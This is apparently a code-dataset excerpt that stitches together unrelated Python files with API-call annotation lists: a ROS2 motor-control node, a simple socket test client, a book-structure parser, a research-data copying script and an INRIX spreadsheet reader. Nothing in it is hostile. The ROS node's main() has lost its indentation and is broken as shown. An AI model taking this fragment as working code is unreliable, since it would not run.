        self.can_bus = can.Bus(bustype='slcan',channel='/dev/ttyACM0',bitrate=1000000)
        self.iface = CAN(self.can_bus)
        for kmotor,motor in self.config['motors'].items():
            if "id_can" in motor :
                motor["tm"]=Tinymovr(node_id=int(motor["id_can"]), iface=self.iface)
                # flags == 1 appears to be the "calibrated/ready" state — TODO confirm
                assert(motor["tm"].motor_config.flags == 1)
                # Remember the encoder reading at start-up; all commands are relative to it.
                motor["offset"] = motor["tm"].encoder_estimates.position
                self.declare_parameter(kmotor+"_max_speed",motor["max_speed"])
                self.declare_parameter(kmotor+"_max_current",motor["max_current"])
                motor["tm"].set_limits(motor["max_speed"]*turn/minute,motor["max_current"]*amps)
                self.declare_parameter(kmotor+"_gain_integrator",motor["gain_integrator"])
                motor["tm"].set_integrator_gains(motor["gain_integrator"])
        self.publisherJoint_ = self.create_publisher(JointState, '/vanille/joint_states', 1)
        self.publisherDiag_ = self.create_publisher(DiagnosticStatus, 'diagnostic',1)
        self.subscription = self.create_subscription(
            JointState,
            '/vanille/joint_position_cmd',
            self.update_position_cmd,
            1)
        timer_period = 0.01 # seconds
        timer_period_diag = 2 # seconds
        self.timer = self.create_timer(timer_period, self.routine)
        self.timerDiag = self.create_timer(timer_period_diag, self.updateDiagnostic)

    def update_position_cmd(self, msg : JointState):
        """Apply a joint position command to every known motor in the message.

        A NaN position switches the motor to zero-current (free-wheel) mode;
        otherwise the target is clipped to the configured joint limits and
        sent as a position set-point, sign-adjusted by the motor orientation.
        """
        for imotor in range(len(msg.name)):
            kmotor = msg.name[imotor]
            if kmotor in self.config['motors']:
                motor = self.config['motors'][kmotor]
                position_target = msg.position[imotor]*rad
                if numpy.isnan(position_target) :
                    # NaN means "release": zero current instead of holding position.
                    motor["tm"].current_control()
                    motor["tm"].set_cur_setpoint(0.0*amps)
                else:
                    position_target = clip(position_target,motor["limit_lower"]*deg, motor["limit_upper"]*deg)
                    if motor["orientation"] == "direct":
                        motor["tm"].position_control()
                        # motor["tm"].set_pos_setpoint(motor["offset"]+position_target*float(motor["ratio"]))
                        motor["tm"].set_pos_setpoint(motor["offset"]+position_target*motor["ratio"])
                    elif motor["orientation"] == "indirect":
                        motor["tm"].position_control()
                        # motor["tm"].set_pos_setpoint(motor["offset"]-position_target*float(motor["ratio"]))
                        motor["tm"].set_pos_setpoint(motor["offset"]-position_target*motor["ratio"])

    def read_positions(self):
        """Publish one JointState with position/velocity/effort for every motor,
        converted back to joint space via each motor's offset, ratio and
        orientation sign."""
        msg = JointState()
        msg.header.stamp = super().get_clock().now().to_msg()
        msg.name = []
        msg.position = []
        msg.velocity = []
        msg.effort = []
        for kmotor,motor in self.config['motors'].items():
            msg.name.append(motor["joint_name"])
            if motor["orientation"] == "direct":
                msg.position.append(float((motor["tm"].encoder_estimates.position-motor["offset"])/float(motor["ratio"])))
                msg.velocity.append(motor["tm"].encoder_estimates.velocity.to(rad/s).m/float(motor["ratio"]))
                msg.effort.append(motor["tm"].Iq.estimate.m*float(motor["ratio"]))
            elif motor["orientation"] == "indirect":
                msg.position.append(float(-(motor["tm"].encoder_estimates.position-motor["offset"])/float(motor["ratio"])))
                msg.velocity.append(-motor["tm"].encoder_estimates.velocity.to(rad/s).m/float(motor["ratio"]))
                msg.effort.append(-motor["tm"].Iq.estimate.m*float(motor["ratio"]))
        self.publisherJoint_.publish(msg)

    def updateDiagnostic(self):
        """Publish one DiagnosticStatus per motor, listing the Tinymovr
        device_info and motor_config key/value pairs."""
        # tmx.device_info = {"device_id": 99999, "fw_major": 0, "fw_minor": 7, "fw_patch": 1, "temp": 45}
        # tmx.motor_config = {"flags": 1, "R": 200, "pole_pairs": 11, "L": 100}
        msg = DiagnosticStatus()
        msg1 = KeyValue()
        for kmotor,motor in self.config['motors'].items():
            msg.values= []
            msg.hardware_id = kmotor
            msg.name = kmotor
            msg.message = "device_info motor_config"
            for kinfo,info in motor["tm"].device_info.items():
                msg1 = KeyValue()
                msg1.key=kinfo
                msg1.value=str(info)
                msg.values.append(msg1)
            for kinfo,info in motor["tm"].motor_config.items():
                msg1 = KeyValue()
                msg1.key=kinfo
                msg1.value=str(info)
                msg.values.append(msg1)
            self.publisherDiag_.publish(msg)

    def routine(self):
        # Fast (10 ms) timer callback: publish the current joint states.
        self.read_positions()

    def stop(self):
        """Put every motor into idle mode before the node exits."""
        self.get_logger().info(f'Stopping HAL Node')
        for kmotor,motor in self.config['motors'].items():
            motor["tm"].idle()
def main(args=None):
print('Hi from hal.')
rclpy.init(args=args)
hal_node = HardwareAbstractionLayer()
try:
rclpy.spin(hal_node)
except KeyboardInterrupt:
pass
hal_node.stop()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
hal_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main() | [
"diagnostic_msgs.msg.KeyValue",
"numpy.clip",
"tinymovr.units.get_registry",
"rclpy.spin",
"diagnostic_msgs.msg.DiagnosticStatus",
"sensor_msgs.msg.JointState",
"can.Bus",
"numpy.isnan",
"json.load",
"rclpy.init",
"rclpy.shutdown",
"tinymovr.iface.can.CAN"
] | [((370, 384), 'tinymovr.units.get_registry', 'get_registry', ([], {}), '()\n', (382, 384), False, 'from tinymovr.units import get_registry\n'), ((5874, 5895), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (5884, 5895), False, 'import rclpy\n'), ((6223, 6239), 'rclpy.shutdown', 'rclpy.shutdown', ([], {}), '()\n', (6237, 6239), False, 'import rclpy\n'), ((783, 795), 'json.load', 'json.load', (['f'], {}), '(f)\n', (792, 795), False, 'import json, numpy\n'), ((846, 911), 'can.Bus', 'can.Bus', ([], {'bustype': '"""slcan"""', 'channel': '"""/dev/ttyACM0"""', 'bitrate': '(1000000)'}), "(bustype='slcan', channel='/dev/ttyACM0', bitrate=1000000)\n", (853, 911), False, 'import can\n'), ((931, 948), 'tinymovr.iface.can.CAN', 'CAN', (['self.can_bus'], {}), '(self.can_bus)\n', (934, 948), False, 'from tinymovr.iface.can import CAN\n'), ((3582, 3594), 'sensor_msgs.msg.JointState', 'JointState', ([], {}), '()\n', (3592, 3594), False, 'from sensor_msgs.msg import JointState\n'), ((4888, 4906), 'diagnostic_msgs.msg.DiagnosticStatus', 'DiagnosticStatus', ([], {}), '()\n', (4904, 4906), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((4922, 4932), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (4930, 4932), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((5956, 5976), 'rclpy.spin', 'rclpy.spin', (['hal_node'], {}), '(hal_node)\n', (5966, 5976), False, 'import rclpy\n'), ((2605, 2633), 'numpy.isnan', 'numpy.isnan', (['position_target'], {}), '(position_target)\n', (2616, 2633), False, 'import json, numpy\n'), ((5225, 5235), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (5233, 5235), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((5431, 5441), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (5439, 5441), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((2805, 2882), 'numpy.clip', 'clip', (['position_target', 
"(motor['limit_lower'] * deg)", "(motor['limit_upper'] * deg)"], {}), "(position_target, motor['limit_lower'] * deg, motor['limit_upper'] * deg)\n", (2809, 2882), False, 'from numpy import clip\n')] |
import socket

# Connection target, filled in by ``address()`` before ``connector()`` runs.
HOST = ""
PORT = ""


def address():
    """Prompt the user for the target host and port, then open the connection.

    The port prompt repeats until a numeric value is entered; previously a
    non-numeric port crashed the script with an uncaught ValueError.
    """
    global HOST
    print("What is the IP of the computer you want to connect to? ")
    HOST = input(":")
    global PORT
    print("What is the PORT of the computer you want to connect to? ")
    while True:
        raw = input(":")
        try:
            PORT = int(raw)
            break
        except ValueError:
            print("Please enter a numeric port.")
    connector()


def connector():
    """Connect to HOST:PORT, send a probe message and print the reply.

    Connection failures (refused, unreachable, timeout) are reported instead
    of crashing with an unhandled exception.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((HOST, PORT))
            s.sendall(b"test")
            data = s.recv(1024)
            print(f"Received {data!r}")
    except OSError as exc:
        print(f"Connection to {HOST}:{PORT} failed: {exc}")


address()
| [
"socket.socket"
] | [((330, 379), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (343, 379), False, 'import socket\n')] |
import re
import _pickle as cPickle
import logging
import argparse
#This script is not dependant on table of contents. It detects books and chapters based their titles
# Dictionary containing key and regex pattern to match the keys
pattern_dict = {
    'blank_line': re.compile(r'^\s*$'),  # empty or whitespace-only line
    'book_number': re.compile(r'(BOOK\s\w+):?\s?(.+)?'),  # captures (book label, trailing text)
    'chapter_number': re.compile(r'CHAPTER\s(\w+)'),  # captures the chapter label
    'epilogue_number': re.compile(r'([A-Za-z]+\sEPILOGUE):?\s?(.+)?')  # epilogues are treated like books
}
BODY_START_CONSEC_BLANK_LINE_COUNT = 9 #Consecutive-blank-line counter value marking the end of the header (table of contents)
FOOTER_START_CONSEC_BLANK_LINE_COUNT = 9 #Counter value marking the start of the footer after the last chapter
END_OF_CHAPTER_CONSEC_BLANK_LINE_COUNT = 4 #Counter value marking the end of a chapter
class Book(object):
    """A single book: its label, its year, and its list of Chapter objects."""

    def __init__(self, bk_number, bk_year, chapter_list):
        self.bk_number = bk_number
        self.bk_year = bk_year
        self.chapter_list = chapter_list
        # Log each book as soon as it is assembled (lazy %-style formatting).
        logging.info('Created book: %s', self.bk_number)
class Chapter(object):
    """One chapter: its label and its ordered list of Paragraph objects."""

    def __init__(self, ch_index, paragraph_list):
        self.ch_index = ch_index
        self.paragraph_list = paragraph_list
class Paragraph(object):
    """One paragraph: its 1-based index and its ordered Sentence objects."""

    def __init__(self, p_index, sentence_list):
        self.p_index = p_index
        self.sentence_list = sentence_list
class Sentence(object):
    """One sentence: its 1-based index and its ordered Word objects."""

    def __init__(self, s_index, wordObj_list):
        self.s_index = s_index
        self.wordObj_list = wordObj_list
class Word(object):
    """One word token: its 1-based index within the sentence and its text."""

    def __init__(self, w_index, word):
        self.w_index = w_index
        self.word = word
def parse_line(line):
    """Match *line* against every regex in ``pattern_dict``.

    Returns the ``(key, match)`` pair of the first pattern that matches,
    or ``(None, None)`` when no pattern matches.
    """
    for label, pattern in pattern_dict.items():
        hit = pattern.search(line)
        if hit is not None:
            return label, hit
    return None, None
def obj_dict(obj):
    """Fallback serializer for ``json.dump``: expose an object's attribute dict.

    (``json.dump`` cannot serialize arbitrary objects on its own.)
    """
    return obj.__dict__
def process_file(filepath):
    """Process a book file line by line.

    Fixes over the previous version: the file handle no longer shadows the
    ``file`` builtin, and ``len()`` is used instead of calling ``__len__()``
    directly. The parsing state machine itself is unchanged.

    Input:
        filepath: location of the file to be processed
    Return:
        book_list: A list of Book objects containing chapters, paragraphs,
        sentences and words
    """
    book_list = []
    try:
        # 'book_file' instead of 'file' so the builtin is not shadowed.
        with open(filepath, encoding="utf8", mode='r') as book_file:
            header_end_found = False  # True once the active line is past the header
            prev_key, book_index, chapter_index = '', '', ''
            paragraph_index, sentence_index, word_index = 1, 1, 1
            # Temporary buffers for lower-level objects before they are
            # attached to their parent object.
            sentence_list, paragraph_list, chapter_list, word_list = [], [], [], []
            # The whole book may not be available at once, so read one line
            # at a time; this also avoids loading the entire file in memory.
            for line in book_file:
                key, match = parse_line(line)  # classify the line via pattern_dict
                if key == 'blank_line' and prev_key == 'blank_line':
                    consec_empty_line_count += 1  # consecutive blank lines: increment
                else:
                    consec_empty_line_count = 0  # streak broken: reset
                if not header_end_found:
                    # Skip the header; nothing to process until its end marker.
                    if consec_empty_line_count == BODY_START_CONSEC_BLANK_LINE_COUNT:
                        header_end_found = True
                else:  # in book body
                    if key == 'book_number' or key == 'epilogue_number':
                        # Beginning of a new book; flush the previous one (if any).
                        if chapter_list:
                            book_ob = Book(book_index, book_year, chapter_list)
                            book_list.append(book_ob)
                            chapter_list = []
                        book_index = match.group(1)
                        book_year = match.group(2)
                    elif key == 'chapter_number':
                        # Beginning of a new chapter: reset the lower-level counters.
                        chapter_index = match.group(1)
                        paragraph_index = 1
                        sentence_index = 1
                        word_index = 1
                    elif key == 'blank_line':
                        if consec_empty_line_count == FOOTER_START_CONSEC_BLANK_LINE_COUNT:
                            # Start of the footer: flush the last book and stop.
                            book_ob = Book(book_index, book_year, chapter_list)
                            book_list.append(book_ob)
                            break
                        if word_list:
                            # Paragraph ended without .?! (e.g. ends with ':'):
                            # close the pending sentence.
                            sen_ob = Sentence(sentence_index, word_list)
                            sentence_list.append(sen_ob)
                            word_list = []
                        if consec_empty_line_count == END_OF_CHAPTER_CONSEC_BLANK_LINE_COUNT and paragraph_list:
                            # End of chapter: flush the collected paragraphs.
                            chap_ob = Chapter(chapter_index, paragraph_list)
                            chapter_list.append(chap_ob)
                            paragraph_list = []
                        elif sentence_list:
                            # End of paragraph: flush the collected sentences.
                            par_ob = Paragraph(paragraph_index, sentence_list)
                            sentence_list = []
                            paragraph_list.append(par_ob)
                            paragraph_index += 1
                            sentence_index = 1
                            word_index = 1
                    else:  # line with content
                        line = line.replace("’", "")  # strip apostrophes
                        # Split on sentence terminators, except after "St" (St. Petersburg etc.).
                        sen_in_line = re.split(r'(?<!St)[.!?]', line)
                        if len(sen_in_line) == 1:  # no sentence ending on this line
                            words_in_line = re.findall(r'[\w]+', line)
                            for word in words_in_line:
                                word_index = add_word_to_list(word, word_index, word_list)
                        else:  # line contains one or more sentence endings
                            for idx, split in enumerate(sen_in_line):
                                if split:  # skip empty pieces from consecutive periods (...)
                                    words_in_line = re.findall(r'[\w]+', split)
                                    for word in words_in_line:
                                        word_index = add_word_to_list(word, word_index, word_list)
                                    if (idx + 1) < len(sen_in_line):
                                        # This piece ends a sentence: flush it.
                                        sen_ob = Sentence(sentence_index, word_list)
                                        sentence_list.append(sen_ob)
                                        word_list = []
                                        sentence_index += 1
                                        word_index = 1
                prev_key = key
        if not header_end_found:
            logging.error("Header end not defined")
    # NOTE: FileNotFoundError is a subclass of IOError/OSError; the separate
    # clauses are kept for explicitness.
    except FileNotFoundError as ex:
        print(ex)
    except IOError as ex:
        print(ex)
    except Exception as ex:
        print(ex)
    return book_list
def add_word_to_list(word, word_index, word_list):
    """Wrap *word* in a Word object, append it to *word_list*.

    Input:
        word: word text to be added
        word_index: index of the word within the current sentence
        word_list: list of Word objects to append to
    Return:
        the index to use for the next word
    """
    word_list.append(Word(word_index, word))
    return word_index + 1
logging.basicConfig(level=logging.DEBUG,format='%(asctime)s:%(levelname)s:%(message)s')
def main_wrapper(args):
    """Parse the input book file and pickle the resulting Book objects.

    :param args: parsed CLI namespace with input_file_path / output_file_path
    :return: None
    """
    source_path = args.input_file_path
    target_path = args.output_file_path
    logging.info('Working on book: %s', source_path)
    books = process_file(source_path)
    if not books:
        print('No books found')
        return
    try:
        with open(target_path, mode='wb') as pickle_out:
            cPickle.dump(books, pickle_out)
    except Exception as ex:
        print(ex)
def args_parser():
"""
handles and validates CLI
:return:
"""
parser = argparse.ArgumentParser(description="Parses files containing books and serializes the structure")
parser.add_argument("-inp",help="full path of the file to parse",dest = "input_file_path",type=str,required=True)
parser.add_argument("-out", help="output path to the serialized file", dest="output_file_path", type=str, required=True)
parser.set_defaults(func=main_wrapper)
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
args_parser() | [
"logging.basicConfig",
"re.split",
"argparse.ArgumentParser",
"_pickle.dump",
"re.compile",
"re.findall",
"logging.error"
] | [((9074, 9167), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""%(asctime)s:%(levelname)s:%(message)s"""'}), "(level=logging.DEBUG, format=\n '%(asctime)s:%(levelname)s:%(message)s')\n", (9093, 9167), False, 'import logging\n'), ((269, 289), 're.compile', 're.compile', (['"""^\\\\s*$"""'], {}), "('^\\\\s*$')\n", (279, 289), False, 'import re\n'), ((310, 348), 're.compile', 're.compile', (['"""(BOOK\\\\s\\\\w+):?\\\\s?(.+)?"""'], {}), "('(BOOK\\\\s\\\\w+):?\\\\s?(.+)?')\n", (320, 348), False, 'import re\n'), ((370, 400), 're.compile', 're.compile', (['"""CHAPTER\\\\s(\\\\w+)"""'], {}), "('CHAPTER\\\\s(\\\\w+)')\n", (380, 400), False, 'import re\n'), ((424, 471), 're.compile', 're.compile', (['"""([A-Za-z]+\\\\sEPILOGUE):?\\\\s?(.+)?"""'], {}), "('([A-Za-z]+\\\\sEPILOGUE):?\\\\s?(.+)?')\n", (434, 471), False, 'import re\n'), ((9756, 9858), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Parses files containing books and serializes the structure"""'}), "(description=\n 'Parses files containing books and serializes the structure')\n", (9779, 9858), False, 'import argparse\n'), ((8449, 8488), 'logging.error', 'logging.error', (['"""Header end not defined"""'], {}), "('Header end not defined')\n", (8462, 8488), False, 'import logging\n'), ((9530, 9567), '_pickle.dump', 'cPickle.dump', (['book_list', 'cpickle_file'], {}), '(book_list, cpickle_file)\n', (9542, 9567), True, 'import _pickle as cPickle\n'), ((6919, 6949), 're.split', 're.split', (['"""(?<!St)[.!?]"""', 'line'], {}), "('(?<!St)[.!?]', line)\n", (6927, 6949), False, 'import re\n'), ((7082, 7108), 're.findall', 're.findall', (['"""[\\\\w]+"""', 'line'], {}), "('[\\\\w]+', line)\n", (7092, 7108), False, 'import re\n'), ((7603, 7630), 're.findall', 're.findall', (['"""[\\\\w]+"""', 'split'], {}), "('[\\\\w]+', split)\n", (7613, 7630), False, 'import re\n')] |
from __future__ import print_function
from fileinput import filename
import os
import pandas as pd
import pdb
from datetime import timedelta
import datetime
import shutil
date_time_format = '%Y-%m-%dT%H:%M:%S.%f'
date_format = '%Y-%m-%d'
def make_dir(data_path):
    """Create *data_path* if it does not exist yet.

    Uses ``os.makedirs(..., exist_ok=True)`` so the check-then-create race of
    the previous ``exists()``/``mkdir()`` pair cannot raise, and missing
    parent directories are created as well (``os.mkdir`` failed on them).
    """
    os.makedirs(data_path, exist_ok=True)
def check_micu_data_valid(data_time, start_date1, end_date1, start_date2, end_date2):
    """Return True when *data_time* falls inside either MICU stay window.

    The second window is only considered when ``start_date2`` is not the
    literal string 'nan' (how missing schedule entries are passed in by the
    caller).
    """
    moment = pd.to_datetime(data_time)
    in_first = pd.to_datetime(start_date1) <= moment <= pd.to_datetime(end_date1)
    in_second = False
    if start_date2 != 'nan':
        in_second = pd.to_datetime(start_date2) <= moment <= pd.to_datetime(end_date2)
    return bool(in_first or in_second)
if __name__ == '__main__':
    # Read data root path
    root_dir = '/media/data/tiles-processed/tiles-phase2-delivery'
    output_dir = '/media/data/tiles-opendataset/tiles-phase2-opendataset-audio'
    # NOTE(review): 'delevery' is a typo for 'delivery'; the name is kept as-is.
    delevery_root_path = os.path.abspath(os.path.join(root_dir, 'delivery_data'))
    setup_root_path = os.path.abspath(os.path.join(root_dir, 'setup_data'))
    participant_info_path = os.path.abspath(os.path.join(root_dir, 'participant-info'))
    # read study period data frame
    consent_df = pd.read_csv(os.path.join(root_dir, 'consents.csv'), index_col=5)
    study_period = pd.read_csv(os.path.join(participant_info_path, 'study-periods.csv'), index_col=0)
    micu_df = pd.read_csv(os.path.join(participant_info_path, 'p2_micuschedules_public_5.21.csv'), index_col=0)
    # Drop participants with no first MICU stay scheduled.
    micu_df = micu_df.dropna(subset=['MICU Start Date 1'])
    participant_list = list(study_period.index)
    consent_participant_list = list(consent_df.index)
    participant_list.sort()
    # NOTE(review): the loop variable 'id' shadows the builtin id().
    for id in participant_list:
        # if no consent
        if id not in consent_participant_list:
            continue
        print(id, consent_df.loc[id, 'audio_future'])
        # NOTE(review): 'is False' only matches a real bool False; a cell read
        # as the string 'False' or NaN would slip through — confirm dtype.
        if consent_df.loc[id, 'audio_future'] is False:
            continue
        # if no data, continue
        audio_data_path = os.path.join('/media/data/tiles-processed', 'tiles-phase2-opendataset-audio', 'raw-features', id)
        if os.path.exists(audio_data_path) is False:
            continue
        # First MICU window, expanded to whole days: [start 00:00, end 23:59].
        micu_start1 = pd.to_datetime(micu_df.loc[id, 'MICU Start Date 1']).strftime(date_time_format)[:-3]
        micu_start2 = str(micu_df.loc[id, 'MICU Start Date 2'])
        micu_end1 = (pd.to_datetime(micu_df.loc[id, 'MICU End Date 1'])+timedelta(days=1, minutes=-1)).strftime(date_time_format)[:-3]
        micu_end2 = str(micu_df.loc[id, 'MICU End Date 2'])
        if str(micu_start2) != 'nan':
            # Cap the combined stay at 21 days: the second window only keeps
            # whatever days the first window did not already use.
            number_of_days1 = int((pd.to_datetime(micu_end1) - pd.to_datetime(micu_start1)).total_seconds() / (24 * 3600)) + 1
            left_days = 21 - number_of_days1
            if left_days:
                micu_end2 = (pd.to_datetime(micu_start2) + timedelta(days=left_days, minutes=-1)).strftime(date_time_format)[:-3]
            else:
                micu_start2, micu_end2 = 'nan', 'nan'
        file_list = os.listdir(audio_data_path)
        for file_name in file_list:
            if 'RawFeatures' in file_name:
                continue
            # File names look like '<unix-timestamp>.csv.gz'; the timestamp also
            # keys the matching fg-prediction file.
            # NOTE(review): 'time' shadows the stdlib module name.
            time = file_name.split('.csv.gz')[0]
            date_time = datetime.datetime.fromtimestamp(int(time)).strftime(date_format)
            if check_micu_data_valid(date_time, micu_start1, micu_end1, micu_start2, micu_end2) is True:
                make_dir(output_dir)
                make_dir(os.path.join(output_dir, 'raw-features'))
                make_dir(os.path.join(output_dir, 'raw-features', id))
                make_dir(os.path.join(output_dir, 'fg-predictions'))
                make_dir(os.path.join(output_dir, 'fg-predictions', id))
                # destination paths in the open-dataset tree
                raw_feature_output_path = os.path.join(output_dir, 'raw-features', id, file_name)
                fg_predictions_output_path = os.path.join(output_dir, 'fg-predictions', id, str(time)+'.npy')
                # source paths in the processed tree
                raw_feature_path = os.path.join(audio_data_path, file_name)
                fg_predictions_path = os.path.join('/media/data/tiles-processed', 'tiles-phase2-opendataset-audio', 'fg-predictions', id, str(time)+'.npy')
                shutil.copy(raw_feature_path, raw_feature_output_path)
                # fg predictions may be missing for a timestamp; copy only if present.
                if os.path.exists(fg_predictions_path) is True:
                    shutil.copy(fg_predictions_path, fg_predictions_output_path)
                print('save %s, %s' % (id, raw_feature_path))
| [
"os.path.exists",
"os.listdir",
"os.path.join",
"os.mkdir",
"shutil.copy",
"datetime.timedelta",
"pandas.to_datetime"
] | [((274, 299), 'os.path.exists', 'os.path.exists', (['data_path'], {}), '(data_path)\n', (288, 299), False, 'import os\n'), ((318, 337), 'os.mkdir', 'os.mkdir', (['data_path'], {}), '(data_path)\n', (326, 337), False, 'import os\n'), ((1210, 1249), 'os.path.join', 'os.path.join', (['root_dir', '"""delivery_data"""'], {}), "(root_dir, 'delivery_data')\n", (1222, 1249), False, 'import os\n'), ((1289, 1325), 'os.path.join', 'os.path.join', (['root_dir', '"""setup_data"""'], {}), "(root_dir, 'setup_data')\n", (1301, 1325), False, 'import os\n'), ((1371, 1413), 'os.path.join', 'os.path.join', (['root_dir', '"""participant-info"""'], {}), "(root_dir, 'participant-info')\n", (1383, 1413), False, 'import os\n'), ((1480, 1518), 'os.path.join', 'os.path.join', (['root_dir', '"""consents.csv"""'], {}), "(root_dir, 'consents.csv')\n", (1492, 1518), False, 'import os\n'), ((1564, 1620), 'os.path.join', 'os.path.join', (['participant_info_path', '"""study-periods.csv"""'], {}), "(participant_info_path, 'study-periods.csv')\n", (1576, 1620), False, 'import os\n'), ((1661, 1732), 'os.path.join', 'os.path.join', (['participant_info_path', '"""p2_micuschedules_public_5.21.csv"""'], {}), "(participant_info_path, 'p2_micuschedules_public_5.21.csv')\n", (1673, 1732), False, 'import os\n'), ((2272, 2373), 'os.path.join', 'os.path.join', (['"""/media/data/tiles-processed"""', '"""tiles-phase2-opendataset-audio"""', '"""raw-features"""', 'id'], {}), "('/media/data/tiles-processed',\n 'tiles-phase2-opendataset-audio', 'raw-features', id)\n", (2284, 2373), False, 'import os\n'), ((3288, 3315), 'os.listdir', 'os.listdir', (['audio_data_path'], {}), '(audio_data_path)\n', (3298, 3315), False, 'import os\n'), ((2381, 2412), 'os.path.exists', 'os.path.exists', (['audio_data_path'], {}), '(audio_data_path)\n', (2395, 2412), False, 'import os\n'), ((4088, 4143), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""', 'id', 'file_name'], {}), "(output_dir, 'raw-features', id, 
file_name)\n", (4100, 4143), False, 'import os\n'), ((4336, 4376), 'os.path.join', 'os.path.join', (['audio_data_path', 'file_name'], {}), '(audio_data_path, file_name)\n', (4348, 4376), False, 'import os\n'), ((4549, 4603), 'shutil.copy', 'shutil.copy', (['raw_feature_path', 'raw_feature_output_path'], {}), '(raw_feature_path, raw_feature_output_path)\n', (4560, 4603), False, 'import shutil\n'), ((447, 472), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (461, 472), True, 'import pandas as pd\n'), ((475, 502), 'pandas.to_datetime', 'pd.to_datetime', (['start_date1'], {}), '(start_date1)\n', (489, 502), True, 'import pandas as pd\n'), ((538, 563), 'pandas.to_datetime', 'pd.to_datetime', (['end_date1'], {}), '(end_date1)\n', (552, 563), True, 'import pandas as pd\n'), ((566, 591), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (580, 591), True, 'import pandas as pd\n'), ((2475, 2527), 'pandas.to_datetime', 'pd.to_datetime', (["micu_df.loc[id, 'MICU Start Date 1']"], {}), "(micu_df.loc[id, 'MICU Start Date 1'])\n", (2489, 2527), True, 'import pandas as pd\n'), ((3725, 3765), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""'], {}), "(output_dir, 'raw-features')\n", (3737, 3765), False, 'import os\n'), ((3792, 3836), 'os.path.join', 'os.path.join', (['output_dir', '"""raw-features"""', 'id'], {}), "(output_dir, 'raw-features', id)\n", (3804, 3836), False, 'import os\n'), ((3880, 3922), 'os.path.join', 'os.path.join', (['output_dir', '"""fg-predictions"""'], {}), "(output_dir, 'fg-predictions')\n", (3892, 3922), False, 'import os\n'), ((3949, 3995), 'os.path.join', 'os.path.join', (['output_dir', '"""fg-predictions"""', 'id'], {}), "(output_dir, 'fg-predictions', id)\n", (3961, 3995), False, 'import os\n'), ((4623, 4658), 'os.path.exists', 'os.path.exists', (['fg_predictions_path'], {}), '(fg_predictions_path)\n', (4637, 4658), False, 'import os\n'), ((4688, 4748), 'shutil.copy', 
'shutil.copy', (['fg_predictions_path', 'fg_predictions_output_path'], {}), '(fg_predictions_path, fg_predictions_output_path)\n', (4699, 4748), False, 'import shutil\n'), ((697, 722), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (711, 722), True, 'import pandas as pd\n'), ((725, 752), 'pandas.to_datetime', 'pd.to_datetime', (['start_date2'], {}), '(start_date2)\n', (739, 752), True, 'import pandas as pd\n'), ((792, 817), 'pandas.to_datetime', 'pd.to_datetime', (['end_date2'], {}), '(end_date2)\n', (806, 817), True, 'import pandas as pd\n'), ((820, 845), 'pandas.to_datetime', 'pd.to_datetime', (['data_time'], {}), '(data_time)\n', (834, 845), True, 'import pandas as pd\n'), ((2646, 2696), 'pandas.to_datetime', 'pd.to_datetime', (["micu_df.loc[id, 'MICU End Date 1']"], {}), "(micu_df.loc[id, 'MICU End Date 1'])\n", (2660, 2696), True, 'import pandas as pd\n'), ((2697, 2726), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)', 'minutes': '(-1)'}), '(days=1, minutes=-1)\n', (2706, 2726), False, 'from datetime import timedelta\n'), ((3086, 3113), 'pandas.to_datetime', 'pd.to_datetime', (['micu_start2'], {}), '(micu_start2)\n', (3100, 3113), True, 'import pandas as pd\n'), ((3116, 3153), 'datetime.timedelta', 'timedelta', ([], {'days': 'left_days', 'minutes': '(-1)'}), '(days=left_days, minutes=-1)\n', (3125, 3153), False, 'from datetime import timedelta\n'), ((2894, 2919), 'pandas.to_datetime', 'pd.to_datetime', (['micu_end1'], {}), '(micu_end1)\n', (2908, 2919), True, 'import pandas as pd\n'), ((2922, 2949), 'pandas.to_datetime', 'pd.to_datetime', (['micu_start1'], {}), '(micu_start1)\n', (2936, 2949), True, 'import pandas as pd\n')] |
from util_data_storage_and_load import *
import openpyxl
data_folder = '/home/jzh/Dropbox/Research/\
Data-driven_estimation_inverse_optimization/INRIX/Raw_data/'

# Twelve filtered INRIX attribute tables, one per link (1..12).
N_LINKS = 12


def _read_tmc_list(workbook_path):
    """Return the TMC codes of one attribute table.

    Reads column 2 (TMC code) of rows 2..max_row (row 1 is the header)
    of the first worksheet, encoding each value as UTF-8 to match the
    original behaviour.
    """
    wb = openpyxl.load_workbook(workbook_path)
    # First worksheet; equivalent to get_sheet_by_name(sheetnames[0]),
    # which is deprecated in recent openpyxl.
    sheet = wb.worksheets[0]
    return [sheet.cell(row=i, column=2).value.encode('utf-8')
            for i in range(2, 1 + sheet.max_row)]


########## extract tmc info for links 1..12
tmc_lists = [_read_tmc_list(data_folder +
                            'filtered_INRIX_attribute_table_link_%d.xlsx' % idx)
             for idx in range(1, N_LINKS + 1)]

# Keep the original per-link names for any code that references them directly.
(tmc_list_link_1, tmc_list_link_2, tmc_list_link_3, tmc_list_link_4,
 tmc_list_link_5, tmc_list_link_6, tmc_list_link_7, tmc_list_link_8,
 tmc_list_link_9, tmc_list_link_10, tmc_list_link_11,
 tmc_list_link_12) = tmc_lists

